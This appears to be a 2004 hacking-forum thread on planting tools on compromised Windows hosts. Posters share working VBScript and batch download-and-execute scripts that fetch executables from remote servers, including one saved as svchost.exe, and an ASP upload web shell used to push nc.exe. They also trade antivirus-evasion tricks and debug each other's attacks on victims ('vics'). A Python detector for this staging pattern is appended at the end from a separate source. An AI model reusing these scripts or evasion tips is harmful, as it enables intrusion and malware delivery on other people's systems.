dragonfly
So if I'm right I can do this to start serv-u or something:
CODE

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs
echo xPost.Open "GET","http://www.MYSERVER.com/servudaemon.ini",0
echo xPost.Open "GET","http://www.MYSERVER.com/servudaemon.exe",0
>>webdown.vbs
echo xPost.Send() >>webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs
echo sGet.Mode = 3 >>webdown.vbs
echo sGet.Type = 1 >>webdown.vbs
echo sGet.Open() >>webdown.vbs
echo sGet.Write(xPost.responseBody) >>webdown.vbs
echo sGet.SaveToFile "servudaemon.exe",2 >>webdown.vbs
cscript webdown.vbs


And now will start serv-u??
boshcash
QUOTE (dragonfly @ Mar 14 2004, 08:06 AM)
So if I'm right I can do this to start serv-u or something:
CODE

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs
echo xPost.Open "GET","http://www.MYSERVER.com/servudaemon.ini",0
echo xPost.Open "GET","http://www.MYSERVER.com/servudaemon.exe",0
>>webdown.vbs
echo xPost.Send() >>webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs
echo sGet.Mode = 3 >>webdown.vbs
echo sGet.Type = 1 >>webdown.vbs
echo sGet.Open() >>webdown.vbs
echo sGet.Write(xPost.responseBody) >>webdown.vbs
echo sGet.SaveToFile "servudaemon.exe",2 >>webdown.vbs
cscript webdown.vbs


And now will start serv-u??

better get each file separately
dragonfly
huh, can you give me more explanation please...
sorry man
DumpZ
use the script twice. use the script again for each file. and just start ur files like u normally do


/Edit

Well it's a very nice tool but unfortunately my McAfee AV still detects it, even the new version, but no i just have to stop the AV services
dragonfly
CODE
C:\WINDOWS\system32>echo Set xPost = CreateObject("Microsoft.XMLHTTP")  1>webdown.vbs

C:\WINDOWS\system32>echo xPost.Open "GET","*********************",0  1>>webdown.vbs

C:\WINDOWS\system32>echo xPost.Send()  1>>webdown.vbs

C:\WINDOWS\system32>echo Set sGet = CreateObject("ADODB.Stream")  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Mode = 3  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Type = 1  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Open()  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Write(xPost.responseBody)  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.SaveToFile "svchost.exe",2  1>>webdown.vbs

C:\WINDOWS\system32>cscript webdown.vbs
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.

C:\WINDOWS\system32\webdown.vbs(3, 1) msxml3.dll: The system cannot locate the resource specified.


What to do now?
101


another method here http://www.governmentsecurity.org/forum/in...?showtopic=7255 , no virus detection, no uploads/downloads scripts.
-Arthy-
Maybe it's posted above me.
But I'm too lazy to read all the replies

Anyways, when you have a download manager running it runs the download manager

You won't see any difference when it's noticed by the download manager, only thing is that it doesn't start downloading...

So that's at least one minus point
DumpZ
QUOTE (dragonfly @ Mar 15 2004, 02:55 PM)
CODE
C:\WINDOWS\system32>echo Set xPost = CreateObject("Microsoft.XMLHTTP")  1>webdown.vbs

C:\WINDOWS\system32>echo xPost.Open "GET","*********************",0  1>>webdown.vbs

C:\WINDOWS\system32>echo xPost.Send()  1>>webdown.vbs

C:\WINDOWS\system32>echo Set sGet = CreateObject("ADODB.Stream")  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Mode = 3  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Type = 1  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Open()  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Write(xPost.responseBody)  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.SaveToFile "svchost.exe",2  1>>webdown.vbs

C:\WINDOWS\system32>cscript webdown.vbs
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.

C:\WINDOWS\system32\webdown.vbs(3, 1) msxml3.dll: The system cannot locate the resource specified.


What to do now?

The VBscript failed to execute correctly i guess because i don't that message.
extreme
First of all, this is local stuff, so of course your download manager will be alerted...
Second, you don't have to know VBS much to see that xPost is a variable for first file.. If you wish to download second file, just use diff variable...
Mandarins
I think this progie EXE2VBS could be quite useful

h**p://www.haxorcitos.com/ficheros/EXE2VBS_10.zip
3plx
when i try to run this on my comp i got error on line 1 char 1 can someone help me and recode this
xPost.Open "GET","***/tlist.exe",0
xPost.Open "GET","***/3plx/sux.ini",0
xPost.Open "GET","***/sux.dll",0
xPost.Open "GET","*****/ServUDaemon.ini",0
xPost.Open "GET","***/kill.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "tlist.exe",2
sGet.SaveToFile "sux.ini",2
sGet.SaveToFile "sux.dll",2
sGet.SaveToFile "sql.exe",2
sGet.SaveToFile "ServUDaemon.ini",2
sGet.SaveToFile "kill.exe",2
cscript webdown.vbs
Killaloop
QUOTE (dragonfly @ Mar 15 2004, 02:55 PM)
CODE
C:\WINDOWS\system32>echo Set xPost = CreateObject("Microsoft.XMLHTTP")  1>webdown.vbs

C:\WINDOWS\system32>echo xPost.Open "GET","*********************",0  1>>webdown.vbs

C:\WINDOWS\system32>echo xPost.Send()  1>>webdown.vbs

C:\WINDOWS\system32>echo Set sGet = CreateObject("ADODB.Stream")  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Mode = 3  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Type = 1  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Open()  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.Write(xPost.responseBody)  1>>webdown.vbs

C:\WINDOWS\system32>echo sGet.SaveToFile "svchost.exe",2  1>>webdown.vbs

C:\WINDOWS\system32>cscript webdown.vbs
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.

C:\WINDOWS\system32\webdown.vbs(3, 1) msxml3.dll: The system cannot locate the resource specified.


What to do now?

xml is not installed on that system use a method without the need of xml code.
Montague
really nice, I tried it and it worked for me.
Thanks for sharing this really fast method!

BacKZoiD.
Killaloop
QUOTE (3plx @ Apr 5 2004, 08:08 AM)
when i try to run this on my comp i got error on line 1 char 1 can someone help me and recode this
xPost.Open "GET","***/tlist.exe",0
xPost.Open "GET","***/3plx/sux.ini",0
xPost.Open "GET","***/sux.dll",0
xPost.Open "GET","*****/ServUDaemon.ini",0
xPost.Open "GET","***/kill.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "tlist.exe",2
sGet.SaveToFile "sux.ini",2
sGet.SaveToFile "sux.dll",2
sGet.SaveToFile "sql.exe",2
sGet.SaveToFile "ServUDaemon.ini",2
sGet.SaveToFile "kill.exe",2
cscript webdown.vbs

how should this ever work? you don't know much about vbs I guess..
well I don't know nothing too, but that what I know looks like this:

Set firstFile = CreateObject("Microsoft.XMLHTTP")
Set SecondFile = CreateObject("Microsoft.XMLHTTP")
firstFile.Open "GET","http://download.dameware.us/files/DNTUEXP.MSI",0
firstFile.Send()
Set File1 = CreateObject("ADODB.Stream")
File1.Mode = 3
File1.Type = 1
File1.Open()
File1.Write(firstFile.responseBody)
File1.SaveToFile "first.msi",2
SecondFile.Open "GET","http://download.dameware.us/files/DNTUEXP.zip",0
SecondFile.Send()
Set File2 = CreateObject("ADODB.Stream")
File2.Mode = 3
File2.Type = 1
File2.Open()
File2.Write(SecondFile.responseBody)
File2.SaveToFile "second.zip",2

for more than 2 files you will figure out on your own I hope, since I used easy to understand variables. however there are faster ways too but you have to take care not to write the same stream into every file... it's not that easy.
frgn
i like this method very much, works just fine and no av detects it, if you run your file separately.

thx
tianzhen
i found some vics begin deleting the cscript.exe
frgn
just found out, that McAfee server edition detects the script...

but i got told that from a friend of mine, so i can't tell any further details

(script without automatic execution of exe-file)
axelfoley643
interesting, thanks m8
2Fa$t
Every time i wanna use with sqlexec it says sql_error by echoing the commands!
Somebody knows a suggestion?
rouge
best way is just the ftp.exe way or tftp.exe cuz the others are detected or will be detected very soon.

But when i tested i get,

echo Set HTTPGET = CreateObject(^"^Microsoft.XMLHTTP^"^)>>c:\madefile.vbs


SQL_ERROR

how can that be??? what can i change?
Burton
Hi guys

thx for this great method

I have the same problem, if anyone can help please reply


burton
Killaloop
"i found some vics begin deleting the cscript.exe"
Not admins do it, skids delete it.

"best way is just the ftp.exe way or tftp.exe cuz the others are detected or will be detected very soon."
Nope. Find your own way and don't make it public. still many ways to use scripts to easily bypass firewall because files will be created not downloaded...still the nicest method.

"Every time i wanna use with sqlexec it says sql_error by echoing the commands!
Somebody knows a suggestion?"
the green apple sqlexec doesn't like certain signs so switch to another program, there are 1000 of them just google
The Storm
many progz have problems with echoing " how knows on how to echo a " in Sqlbrowser? would be gr8 PS: the script workx fine at all!
dEuS
That's also a very nice (and working!) idea. THX

I only have a problem with a line:
echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs

That's working, but when I echo this there is only this:
Echo Const adSaveCreateOverWrite

So the "=2" is missing.

That's strange...
But I can't do anything against that
Any suggestions?

cya
Qlimax
tnx buddy it's a nice method of getting files to boxes when the ftp.exe\rcp.exe\tftp.exe do not work
The Storm
QUOTE (dEuS @ Apr 20 2004, 09:42 PM)
That's also a very nice (and working!) idea. THX

I only have a problem with a line:
echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs

That's working, but when I echo this there is only this:
Echo Const adSaveCreateOverWrite

So the "=2" is missing.

That's strange...
But I can't do anything against that
Any suggestions?

cya

I also have this problem. I think u use SQLEXEC 1 or 2, there it doesn't work, don't know why, maybe the =2 is a special code or sth. like this! Who knows a tool like SQL Browser that can echo a " would be gr8 help!
[eXPhase
Some AV do detect the script, but I found out that they only delete it when you are downloading an executable file. When I rename my tool program.exe to program.doc on my http server and rename it on the victim after download, it still works

Btw. On some vics the download doesn't start at all... that is because cscript.exe is deleted?
dmg
QUOTE (dEuS @ Apr 20 2004, 09:42 PM)
That's also a very nice (and working!) idea. THX

I only have a problem with a line:
echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs

That's working, but when I echo this there is only this:
Echo Const adSaveCreateOverWrite

So the "=2" is missing.

That's strange...
But I can't do anything against that
Any suggestions?

cya

Just escape the 2 like this:

CODE
echo Const adSaveCreateOverWrite=^2>>c:\madefile.vbs
xmen
thanks for the script, will test it sometime
-Arthy-
QUOTE ([eXPhase @ Apr 21 2004, 07:56 AM)
Btw. On some vics the download doesn't start at all... that is because cscript.exe is deleted?

I guess more because they have download software running.
totof
how do you do with the instruction PUT ??
F34R
Looks promising... too bad I'm too n00b to know what exactly to edit if I, for example, wanted the bot to download/execute a file such as hxxp://www.tripod.com/example.exe
bdark
QUOTE ([eXPhase @ Apr 21 2004, 07:56 AM)
Btw. On some vics the download doesn't start at all... that is because cscript.exe is deleted?

It could be because there is a service running that doesn't let you create data or files on disk. Maybe stopping it first, and then echoing the commands, so your script file can be created and then executed for downloading your tools/files
147111
temptation of course vbs file is run like exe , and realloader u may have a mistake in ur echoing , if u copy the exact echo with its spaces and change what is supposed to be changed it should work fine , and its tested remotely by the way .. Maybe soon i am planning to release some document about all ways to upload files to cmd shell , since i started with tftp and net share , then i increased my knowledge to the ftp method , then i made that vbs thing , and i knew after that the mshta thing , and i did other way with echoing , but its still beta thing (has some problems , but u can echo anytext u want including signs and all ..
uzec
try:

echo o ftp.server.de >> ftpdownloader.bat
echo anonymous >> ftpdownloader.bat
echo password >> ftpdownloader.bat
echo GET file.exe >> ftpdownloader.bat
echo quit >> ftpdownloader.bat
echo ftp -s:ftpdownloader.bat >> ftpdownloader.bat
echo file.exe >> ftpdownloader.bat
ftpdownloader.bat

will download and execute a file from ftp
147111
many progz have problems with echoing " how knows on how to echo a " in Sqlbrowser? would be gr8 PS: the script workx fine at all!
DMX2
Wowiie...

This is some very very nice info...

Thanks for sharing..

Greetzzz to all
Jack28
GREAT post cuzz nr3 is helping me already for a long time, i use it a lot!
147111
very nice method
thanx
realloader
This Method does not work any more:
see this Error:
C:\WINNT\system32>cscript c:\trojan.vbs
Microsoft ® Windows Script Host Version 5.6
Copyright © Microsoft Corporation 1996-2001. All rights reserved.

c:\trojan.vbs(1, 28) Microsoft VBScript compilation error: Expected ')'
chris105
QUOTE (Action @ Nov 29 2003, 03:20 PM)
mcafee reads it, so its quite useless

useless, lol. just because mcafee reads it why does this make it pointless. is mcafee the only AV does everyone have AV in the first place ?
SyN/AcK
QUOTE (chris105 @ May 26 2004, 06:43 PM)
QUOTE (Action @ Nov 29 2003, 03:20 PM)
mcafee reads it, so its quite useless

useless, lol. just because mcafee reads it why does this make it pointless. is mcafee the only AV does everyone have AV in the first place ?

Quite true... and even more so, does everybody even have an AV? No.

If you wanted to talk about useless, you might suggest this exploit is useless since Unicode/Double Decode exploits are so old now, but does that matter? There are still thousands of comps out there vulnerable to it.
Partizaan
I say nice job works fine
for the record. Norton Corp

Dim Partizaan
Set Partizaan = CreateObject("WScript.Shell")
Partizaan.Run "freecell.exe"

Norton Corp. identifies this string as virus.

Respect to the original coder !
realloader
sorry i got my problem clear.
C0D4R
1.
in victim, save as up.asp

@echo ^<%with server.createobject("adodb.stream"):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile server.mappath(request.querystring("s")),2:end with%^> >up.asp

in your client,save as up.vbs:

with wscript
if .arguments.count<3 then .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end with
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject("microsoft.xmlhttp")
.open "post",url,false:.send s
wscript.echo .statustext
end with

do it:
cscript up.vbs http://123.45.67.89/up.asp nc.exe mm.exe

2.
start its:http://www.sometips.com/soft/ps.exe
cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5"
dir /s ps[1].exe
copy XX000XXX\ps[1].exe c:\path\ps.exe
del XX000XXX\ps[1].exe

3.
@echo with wscript:if .arguments.count^<2 then .quit:end if > dl.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> dl.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> dl.vbs

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

realloader
thank u C0D4R!
it looks complicated, but i will try it !
I can understand #3....it work.
but #1 and #2 ..i dont understand.
asd10
can anyone give the commands for SQL??
i get an error when i use this:"

any help??????


thnx in advance,

AsD10
Frenkovic
thanks, of course it worked when i tested it

and my avs didn't find it either!
FLX
damn, works well boshcash!

anywayz, anybody can help me make this undetectable?
FLX
Daisycutter
the undetected part is easy ... at least with mcafee flx...just change the .exe to .zip

the real problem i see is that in xp sp2 they removed adodb so there must be something else that will work
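
A defender's view of the pattern discussed throughout this thread, as an added example that is not part of the original posts: correlate `echo ... > file.vbs` staging commands with a later `cscript`/`wscript` run of the same file, after undoing the caret escapes the posters mention. It assumes process command-line telemetry in which each command appears as its own `cmd.exe /c ...` launch (as with remote SQL command execution); `detect`, `script_name`, the host names and the sample events are constructed for illustration.

```python
import re
from collections import defaultdict

# Strings the scripts posted in this thread depend on (compared in lower case).
INDICATORS = ("microsoft.xmlhttp", "adodb.stream", "responsebody", "savetofile")
# Matches "echo <text> > x.vbs", ">>" and the "1>>" form cmd.exe echoes back.
ECHO_RE = re.compile(r"\becho\s+(?P<body>.*?)\s*1?>>?\s*(?P<path>\S+\.vbs)\s*$", re.I)
RUN_RE = re.compile(r"\b[cw]script(?:\.exe)?\b.*?(?P<path>\S+\.vbs)\b", re.I)

def script_name(path):
    """Compare scripts by lower-cased base name (approximation: ignores directory)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events, min_hits=3):
    """Return (host, script, indicators) for each script staged by echo and then run."""
    staged = defaultdict(set)            # (host, script) -> indicators written so far
    alerts = []
    for host, cmdline in events:
        line = cmdline.replace("^", "")  # undo cmd.exe caret escapes such as ^" and ^2
        m = ECHO_RE.search(line)
        if m:
            body = m.group("body").lower()
            key = (host, script_name(m.group("path")))
            staged[key].update(i for i in INDICATORS if i in body)
            continue
        m = RUN_RE.search(line)
        if m:
            key = (host, script_name(m.group("path")))
            if len(staged.get(key, ())) >= min_hits:
                alerts.append((host, key[1], sorted(staged[key])))
    return alerts

# Constructed sample telemetry (host, command line); URLs masked as on the page.
SAMPLE_EVENTS = [
    ("SQL01", 'cmd.exe /c echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs'),
    ("SQL01", 'cmd.exe /c echo xPost.Open "GET","*****",0 >>webdown.vbs'),
    ("SQL01", 'cmd.exe /c echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs'),
    ("SQL01", 'cmd.exe /c echo sGet.Write(xPost.responseBody) >>webdown.vbs'),
    ("SQL01", 'cmd.exe /c echo sGet.SaveToFile "out.bin",2 >>webdown.vbs'),
    ("SQL01", "cmd.exe /c cscript webdown.vbs"),
    ("WEB02", r'cmd.exe /c echo Set H = CreateObject(^"Microsoft.XMLHTTP^")>>c:\madefile.vbs'),
    ("WEB02", r'cmd.exe /c echo Set S = CreateObject(^"ADODB.Stream^")>>c:\madefile.vbs'),
    ("WEB02", r"cmd.exe /c echo S.Write H.responseBody>>c:\madefile.vbs"),
    ("WEB02", r"cmd.exe /c cscript //nologo C:\madefile.vbs"),
    ("APP03", 'cmd.exe /c echo WScript.Echo "backup finished" >notify.vbs'),
    ("APP03", "cmd.exe /c cscript notify.vbs"),
]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Commands typed into an interactive shell do not create a process per `echo`, so on such hosts the same indicators have to be matched against the script file content at the time `cscript.exe` or `wscript.exe` starts.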